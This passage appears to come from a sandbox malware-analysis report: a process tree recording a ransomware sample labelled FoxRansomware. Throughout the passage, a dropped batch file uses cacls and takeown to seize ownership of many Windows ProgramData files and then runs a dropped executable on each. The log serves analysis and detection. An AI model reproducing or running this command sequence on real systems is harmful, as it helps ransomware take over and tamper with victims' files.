C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftWordpad.xml" -nobanner4⤵
- Executes dropped EXE
PID:3556
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:6088
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵PID:5460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:4428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""2⤵PID:5552
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C3⤵PID:4392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"3⤵PID:5984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftNotepad.xml" -nobanner3⤵PID:5152
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftNotepad.xml" -nobanner4⤵
- Executes dropped EXE
PID:2512
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""2⤵PID:5624
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C3⤵PID:5444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"3⤵
- Modifies file permissions
PID:6004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner3⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner4⤵
- Executes dropped EXE
PID:4808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""2⤵PID:5300
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C3⤵PID:3488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"3⤵
- Modifies file permissions
PID:5124
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "NetworkPrinters.xml" -nobanner3⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "NetworkPrinters.xml" -nobanner4⤵
- Executes dropped EXE
PID:5276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6068
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""2⤵PID:5940
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C3⤵PID:5432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"3⤵
- Modifies file permissions
PID:5820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner3⤵PID:4864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner4⤵
- Executes dropped EXE
PID:5356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""2⤵PID:3812
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C3⤵PID:2804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"3⤵PID:5520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner3⤵PID:2856
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:208
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:4248
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:5568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:6060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "device.png" -nobanner3⤵PID:3808
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "device.png" -nobanner4⤵
- Executes dropped EXE
PID:5612
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""2⤵PID:1288
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C3⤵PID:288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"3⤵PID:304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner3⤵PID:3556
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner4⤵
- Executes dropped EXE
PID:4416
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""2⤵PID:5728
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C3⤵PID:2908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"3⤵PID:5188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner3⤵PID:3064
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner4⤵
- Executes dropped EXE
PID:1180
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""2⤵PID:5952
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:5436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:3804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:6032
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:3852
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:4164
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵PID:5904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5152
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:5180
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""2⤵PID:1240
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C3⤵PID:5264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"3⤵PID:2796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner3⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner4⤵
- Executes dropped EXE
PID:6136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""2⤵PID:5024
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C3⤵PID:4500
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"3⤵
- Modifies file permissions
PID:2672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner3⤵PID:5832
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner4⤵PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""2⤵PID:3412
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C3⤵PID:5820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"3⤵PID:3040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "RoamingCredentialSettings.xml" -nobanner3⤵PID:4864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "RoamingCredentialSettings.xml" -nobanner4⤵PID:1304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:5644
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:3756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5752
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵PID:948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:3432
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵PID:1804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:3808
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵PID:3908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:4420
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:5936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵PID:4416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:4772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵PID:284
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.11182604-f7e5-464d-bd44-d178c6d0dbd8.1.etl""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.11182604-f7e5-464d-bd44-d178c6d0dbd8.1.etl" /E /G Admin:F /C3⤵PID:3700
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.11182604-f7e5-464d-bd44-d178c6d0dbd8.1.etl"3⤵
- Modifies file permissions
PID:5460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "UpdateSessionOrchestration.11182604-f7e5-464d-bd44-d178c6d0dbd8.1.etl" -nobanner3⤵PID:5792
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "UpdateSessionOrchestration.11182604-f7e5-464d-bd44-d178c6d0dbd8.1.etl" -nobanner4⤵PID:5224
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:3440
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:1940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:5220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "resource.xml" -nobanner3⤵PID:5528
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "resource.xml" -nobanner4⤵PID:4428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""2⤵PID:4164
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C3⤵PID:5152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"3⤵PID:6012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftLync2010.xml" -nobanner3⤵PID:3736
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftLync2010.xml" -nobanner4⤵PID:4528
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""2⤵PID:4868
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C3⤵PID:2236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"3⤵PID:5372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner3⤵PID:2028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner4⤵PID:6076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""2⤵PID:5984
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C3⤵PID:3980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"3⤵PID:5276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner3⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner4⤵PID:5124
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:3744
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:4764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵PID:1304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:5684
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\mCOoHTMR.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""2⤵PID:5636
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C3⤵PID:4296
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"3⤵PID:948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tm9TVtDr.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner3⤵PID:5544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner4⤵PID:5408
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\tm9TVtDr.exetm9TVtDr.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5644
-
-
-
